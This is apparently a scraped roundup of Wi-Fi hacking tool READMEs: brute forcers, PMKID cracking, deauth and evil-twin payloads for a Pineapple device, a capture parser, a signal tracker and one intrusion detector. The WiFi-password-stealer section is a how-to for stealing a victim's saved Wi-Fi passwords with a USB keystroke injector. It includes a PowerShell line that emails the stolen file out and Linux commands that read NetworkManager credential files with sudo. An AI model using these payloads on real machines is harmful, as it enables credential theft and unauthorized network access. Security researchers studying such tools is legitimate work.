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WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies

By: Zion3R

WinFiHack is a recreational attempt by me to rewrite my previous project Brute-Hacking-Framework's main wifi hacking script that uses netsh and native Windows scripts to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.


The packages are minimal or nearly none πŸ˜…. The package install command is:

pip install rich pyfiglet

Thats it.


So listing the features:

  • Overall Features:
  • We can use custom interfaces or non-default interfaces to run the attack.
  • Well-defined way of using netsh and listing and utilizing targets.
  • Upgradeability
  • Code-Wise Features:
  • Interactive menu-driven system with rich.
  • versatility in using interface, targets, and password files.

How it works

So this is how the bruteforcer works:

  • Provide Interface:

  • The user is required to provide the network interface for the tool to use.

  • By default, the interface is set to Wi-Fi.

  • Search and Set Target:

  • The user must search for and select the target network.

  • During this process, the tool performs the following sub-steps:

    • Disconnects all active network connections for the selected interface.
    • Searches for all available networks within range.
  • Input Password File:

  • The user inputs the path to the password file.

  • The default path for the password file is ./wordlist/default.txt.

  • Run the Attack:

  • With the target set and the password file ready, the tool is now prepared to initiate the attack.

  • Attack Procedure:

  • The attack involves iterating through each password in the provided file.
  • For each password, the following steps are taken:
    • A custom XML configuration for the connection attempt is generated and stored.
    • The tool attempts to connect to the target network using the generated XML and the current password.
    • To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.
    • If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.
    • This loop continues until a successful ping response is received, indicating a successful connection attempt.

How to run this

After installing all the packages just run python rest is history πŸ‘ make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:



For contributions: - First Clone: First Clone the repo into your dev env and do the edits. - Comments: I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - Submit: Submit a PR for me to verify the changes and apprive it if necessary.

Airgorah - A WiFi Auditing Software That Can Perform Deauth Attacks And Passwords Cracking

By: Zion3R

Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.

It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.

⭐ Don't forget to put a star if you like the project!


Airgorah is designed to be used in testing and discovering flaws in networks you are owner of. Performing attacks on WiFi networks you are not owner of is illegal in almost all countries. I am not responsible for whatever damage you may cause by using this software.


This software only works on linux and requires root privileges to run.

You will also need a wireless network card that supports monitor mode and packet injection.


The installation instructions are available here.


The documentation about the usage of the application is available here.


This project is released under MIT license.


If you have any question about the usage of the application, do not hesitate to open a discussion

If you want to report a bug or provide a feature, do not hesitate to open an issue or submit a pull request

Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R

This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.

Program Usage

python -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run


This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R

Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.



During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).


After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.


  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need

  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.


We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.


Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer '' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

ο’‘ Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 windows payload1.dd


  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.

WiFi-Pineapple-MK7_REST-Client - WiFi Hacking Workflow With WiFi Pineapple Mark VII API

By: Zion3R


Author:: TW-D

Version:: 1.3.7

Copyright:: Copyright (c) 2022 TW-D

License:: Distributes under the same terms as Ruby


Requires:: Ruby >= 2.7.0p0 and Pineapple Mark VII >= 2.1.0-stable

Installation (Debian, Ubuntu, Raspbian)::

  • sudo apt-get install build-essential curl g++ ruby ruby-dev

  • sudo gem install net-ssh rest-client tty-progressbar


Library allowing the automation of active or passive attack operations.

Note : "Issues" and "Pull Request" are welcome.


In "./payloads/" directory, you will find :

COMMAND and CONTROL Author Usage
Hak5 Key Croc - Real-time recovery of keystrokes from a keyboard TW-D (edit) ruby ./hak5_key-croc.rb
Maltronics WiFi Deauther - Spam beacon frames TW-D (edit) ruby ./maltronics_wifi-deauther.rb
DEFENSE Author Usage
Hak5 Pineapple Spotter TW-D with special thanks to @DrSKiZZ, @cribb-it, @barry99705 and @dark_pyrro (edit) ruby ./hak5-pineapple_spotter.rb
DoS Author Usage
Deauthentication of clients available on the access points TW-D (edit) ruby ./deauthentication-clients.rb
Evil WPA Access Point TW-D (edit) ruby ./evil-wpa_access-point.rb
Fake Access Points TW-D (edit) ruby ./fake_access-points.rb
Mass Handshakes TW-D (edit) ruby ./mass-handshakes.rb
Rogue Access Points TW-D (edit) ruby ./rogue_access-points.rb
Twin Access Points TW-D (edit) ruby ./twin_access-points.rb
GENERAL Author Usage
System Status, Disk Usage, ... TW-D (edit) ruby ./dashboard-stats.rb
Networking Interfaces TW-D (edit) ruby ./networking-interfaces.rb
System Logs TW-D (edit) ruby ./system-logs.rb
RECON Author Usage
Access Points and Clients on 2.4GHz and 5GHz (with a supported adapter) TW-D (edit) ruby ./access-points_clients_5ghz.rb
Access Points and Clients TW-D (edit) ruby ./access-points_clients.rb
MAC Addresses of Access Points TW-D (edit) ruby ./access-points_mac-addresses.rb
Tagged Parameters of Access Points TW-D (edit) ruby ./access-points_tagged-parameters.rb
Access Points and Wireless Network Mapping with WiGLE TW-D (edit) ruby ./access-points_wigle.rb
MAC Addresses of Clients TW-D (edit) ruby ./clients_mac-addresses.rb
OPEN Access Points TW-D (edit) ruby ./open_access-points.rb
WEP Access Points TW-D (edit) ruby ./wep_access-points.rb
WPA Access Points TW-D (edit) ruby ./wpa_access-points.rb
WPA2 Access Points TW-D (edit) ruby ./wpa2_access-points.rb
WPA3 Access Points TW-D (edit) ruby ./wpa3_access-points.rb
Continuous Recon on 2.4GHz and 5GHz (with a supported adapter) TW-D (edit) ruby ./continuous-recon_5ghz.rb [CTRL+c]
Continuous Recon for Handshakes Capture TW-D (edit) ruby ./continuous-recon_handshakes.rb [CTRL+c]
Continuous Recon TW-D (edit) ruby ./continuous-recon.rb [CTRL+c]

Payload skeleton for development

# Title: <TITLE>
# Description: <DESCRIPTION>
# Author: <AUTHOR>
# Version: <VERSION>
# Category: <CATEGORY>
# ======================


system_authentication = = "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = 1471
system_authentication.mac = "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = "<ROOT-ACCOUNT-PASSWORD>"

if (system_authentication.login)

led =


# [...]


# [...]


# [...]


# [...]


# [...]



Note : Don't hesitate to take inspiration from the payloads directory.

System modules

Authentication accessors/method

system_authentication = = (string) "<PINEAPPLE-IP-ADDRESS>"
system_authentication.port = (integer) 1471
system_authentication.mac = (string) "<PINEAPPLE-MAC-ADDRESS>"
system_authentication.password = (string) "<ROOT-ACCOUNT-PASSWORD>"


LED methods

led =


Pineapple Modules


Notifications method

dashboard_notifications =


Stats method

dashboard_stats =



System method

logging_system =



Clients methods

pineap_clients =

pineap_clients.kick( (string) mac )

EvilWPA accessors/method

evil_wpa =

evil_wpa.ssid = (string default:'PineAP_WPA')
evil_wpa.bssid = (string default:'00:13:37:BE:EF:00')
evil_wpa.auth = (string default:'psk2+ccmp')
evil_wpa.password = (string default:'pineapplesareyummy')
evil_wpa.hidden = (boolean default:false)
evil_wpa.enabled = (boolean default:false)
evil_wpa.capture_handshakes = (boolean default:false)

Filtering methods

pineap_filtering =

pineap_filtering.client_filter( (string) 'allow' | 'deny' )
pineap_filtering.add_client( (string) mac )
pineap_filtering.ssid_filter( (string) 'allow' | 'deny' )

Impersonation methods

pineap_impersonation =

pineap_impersonation.add_ssid( (string) ssid )

OpenAP method

open_ap =


Settings accessors/method

pineap_settings =

pineap_settings.enablePineAP = (boolean default:true)
pineap_settings.autostartPineAP = (boolean default:true)
pineap_settings.armedPineAP = (boolean default:false)
pineap_settings.ap_channel = (string default:'11')
pineap_settings.karma = (boolean default:false)
pineap_settings.logging = (boolean default:false)
pineap_settings.connect_notifications = (boolean default:false)
pineap_settings.disconnect_notifications = (boolean default:false)
pineap_settings.capture_ssids = (boolean default:false)
pineap_settings.beacon_responses = (boolean default:false)
pineap_settings.broadcast_ssid_pool = (boolean default:false)
pineap_settings.broadcast_ssid_pool_random = (boolean default:false)
pineap_settings.pineap_mac = (string default:system_authentication.mac)
pineap_settings.target_mac = (string default:'FF:FF:FF:FF:FF:FF')< br/>pineap_settings.beacon_response_interval = (string default:'NORMAL')
pineap_settings.beacon_interval = (string default:'NORMAL')


Handshakes methods

recon_handshakes =

recon_handshakes.start( (object) ap )
recon_handshakes.output() (object) handshake, (string) destination )

Scanning methods

recon_scanning =

recon_scanning.start( (integer) scan_time )
recon_scanning.start_continuous( (boolean) autoHandshake )
recon_scanning.output( (integer) scanID )
recon_scanning.tags( (object) ap )
recon_scanning.deauth_ap( (object) ap )
recon_scanning.delete( (integer) scanID )


Networking methods

settings_networking =

settings_networking.client_scan( (string) interface )
settings_networking.client_connect( (object) network, (string) interface )
settings_networking.client_disconnect( (string) interface )
settings_networking.recon_interface( (string) interface )

Pinacolada - Wireless Intrusion Detection System For Hak5's WiFi Coconut

Pinacolada looks for typical IEEE 802.11 attacks and then informs you about them as quickly as possible. All this with the help of Hak5's WiFi Coconut, which allows it to listen for threats on all 14 channels in the 2.4GHz range simultaneously.

Supported 802.11 Attacks

Attack Type Status
Deauthentication DoS
Disassociation DoS
Authentication DoS
EvilTwin MiTM


MacOS (With PIP/Python and Homebrew package manager)

pip install flask
brew install wireshark

Linux (With PIP/Python and APT package manager)

pip install flask
apt install tshark

For both operating systems install the WiFi Coconut's userspace


# Download Pinacolada
git clone
cd Pinacolada

# Start Pinacolada


Pinacolada will be accessible from your browser at
The default password is CoconutsAreYummy.
After you have logged in, you can see a dashboard on the start page and you should change the password in the settings tab.

E-Mail Notifications

If configured, Pinacolada will alert you to attacks via E-Mail. In order to send you an E-Mail, however, an E-Mail account for Pinacolada must be specified in the settings tab. To find the necessary information such as SMTP server and SMTP port, search the internet for your mail provider and how their SMTP servers are configured + how to use them. Here are some information about known providers:

Provider SMTP Server SMTP Port (TLS)
Gmail 587
Outlook 587
GoDaddy 587

Not fully tested!

Since I don't own a WiFi Coconut myself, I have to simulate their traffic. So if you encounter any problems, don't hesitate to contact me and open an issue.

Wifi_Db - Script To Parse Aircrack-ng Captures To A SQLite Database

Script to parse Aircrack-ng captures into a SQLite database and extract useful information like handshakes (in 22000 hashcat format), MGT identities, interesting relations between APs, clients and it's Probes, WPS information and a global view of all the APs seen.

           _   __  _             _  _     
__ __(_) / _|(_) __| || |__
\ \ /\ / /| || |_ | | / _` || '_ \
\ V V / | || _|| | | (_| || |_) |
\_/\_/ |_||_| |_| _____ \__,_||_.__/
by r4ulcl


  • Displays if a network is cloaked (hidden) even if you have the ESSID.
  • Shows a detailed table of connected clients and their respective APs.
  • Identifies client probes connected to APs, providing insight into potential security risks usin Rogue APs.
  • Extracts handshakes for use with hashcat, facilitating password cracking.
  • Displays identity information from enterprise networks, including the EAP method used for authentication.
  • Generates a summary of each AP group by ESSID and encryption, giving an overview of the security status of nearby networks.
  • Provides a WPS info table for each AP, detailing information about the Wi-Fi Protected Setup configuration of the network.
  • Logs all instances when a client or AP has been seen with the GPS data and timestamp, enabling location-based analysis.
  • Upload files with capture folder or file. This option supports the use of wildcards (*) to select multiple files or folders.
  • Docker version in Docker Hub to avoid dependencies.
  • Obfuscated mode for demonstrations and conferences.
  • Possibility to add static GPS data.


From DockerHub (RECOMMENDED)

docker pull r4ulcl/wifi_db

Manual installation

Debian based systems (Ubuntu, Kali, Parrot, etc.)


  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo apt install tshark
sudo apt install python3 python3-pip

git clone
cd hcxtools
sudo make install
cd ..


git clone
cd wifi_db
pip3 install -r requirements.txt



  • python3
  • python3-pip
  • tshark
  • hcxtools
sudo pacman -S wireshark-qt
sudo pacman -S python-pip python

git clone
cd hcxtools
sudo make install
cd ..


git clone
cd wifi_db
pip3 install -r requirements.txt


Scan with airodump-ng

Run airodump-ng saving the output with -w:

sudo airodump-ng wlan0mon -w scan --manufacturer --wps --gpsd

Create the SQLite database using Docker

#Folder with captures

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
  • -v $PWD/db.SQLITE:/db.SQLITE: To save de output in current folder db.SQLITE file
  • -v $CAPTURESFOLDER:/captures/: To share the folder with the captures with the docker

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, put the name of the capture without format.

python3 scan-01

In the event that we have multiple captures we can load the folder in which they are directly. And with -d we can rename the output database.

python3 -d database.sqlite scan-folder

Open database

The database can be open with:

Below is an example of a ProbeClientsConnected table.


usage: [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.

-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon i n the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)






wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.


  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.


  • Aircrack-ng

  • All in 1 file (and separately)

  • Kismet

  • Wigle

  • install

  • parse all files in folder -f --folder

  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

  • Support bash multi files: "capture*-1*"

  • Script to delete client or AP from DB (mac). - (Whitelist)

  • Whitelist to don't add mac to DB (file whitelist.txt, add macs, create DB)

  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

  • Table Handhsakes and PMKID

  • Hashcat hash format 22000

  • Table files, if file exists skip (full path)

  • Get HTTP POST passwords

  • DNS querys

This program is a continuation of a part of:


  • RaΓΊl Calvo Laorden (@r4ulcl)


GNU General Public License v3.0

dBmonster - Track WiFi Devices With Their Recieved Signal Strength

With dBmonster you are able to scan for nearby WiFi devices and track them trough the signal strength (dBm) of their sent packets (sniffed with TShark). These dBm values will be plotted to a graph with matplotlib. It can help you to identify the exact location of nearby WiFi devices (use a directional WiFi antenna for the best results) or to find out how your self made antenna works the best (antenna radiation patterns).

Features on Linux and MacOS

Feature Linux MacOS
Listing WiFi interfaces
Track & scan on 2.4GHz
Track & scan on 5GHz
Scanning for AP
Scanning for STA
Beep when device found


git clone
cd dBmonster

# Install required tools (On MacOS without sudo)
sudo python

# Start dBmonster
sudo python

Has been successfully tested on...

WiFi Adapter
Kali Linux ALFA AWUS036NHA, DIY Bi-Quad WiFi Antenna
MacOS Monterey Internal card 802.11 a/b/g/n/ac (MBP 2019)
* should work on any MacOS or Debian based system and with every WiFi card that supports monitor-mode

Troubleshooting for MacOS

Normally, you can only enable monitor-mode on the internal wifi card from MacOS with the airport utility from Apple. Somehow, wireshark (or here TShark) can enable it too on MacOS. Cool, but because of the MacOS system and Wireshark’s workaround, there are many issues running dBmonster on MacOS. After some time, it could freeze and/or you have to stop dBmonster/Tshark manually from the CLI with the ps command. If you want to run it anyway, here are some helpful tips:

Kill dBmonster, if you can't stop it over the GUI

Look if there are any processes, named dBmonster, tshark or python:

sudo ps -U root

Now kill them with the following command:

sudo kill <PID OF PROCESS>

Stop monitor-mode, if it's enabled after running dBmonster

sudo airport <WiFi INTERFACE NAME> sniff

Press control + c after a few seconds

* Please contact me on twitter, if you have anymore problems

Working on...

  • Capture signal strength data for offline graphs
  • Generate graphs from normal wireshark.pcapng file
  • Generate multiple graphs in one coordinate system

Additional information

  • If the tracked WiFi device is out of range or doesn't send any packets, the graph stops plotting till there is new data. So don't panic ;)
  • dBmonster wasn't tested on all systems... If there are any errors or something is going wrong, contact me.
  • If you used dBmonster on a non-listed Platform or WiFi Adapter, please open an issue (with Platform and WiFi Adapter information) and I will add your specification to the
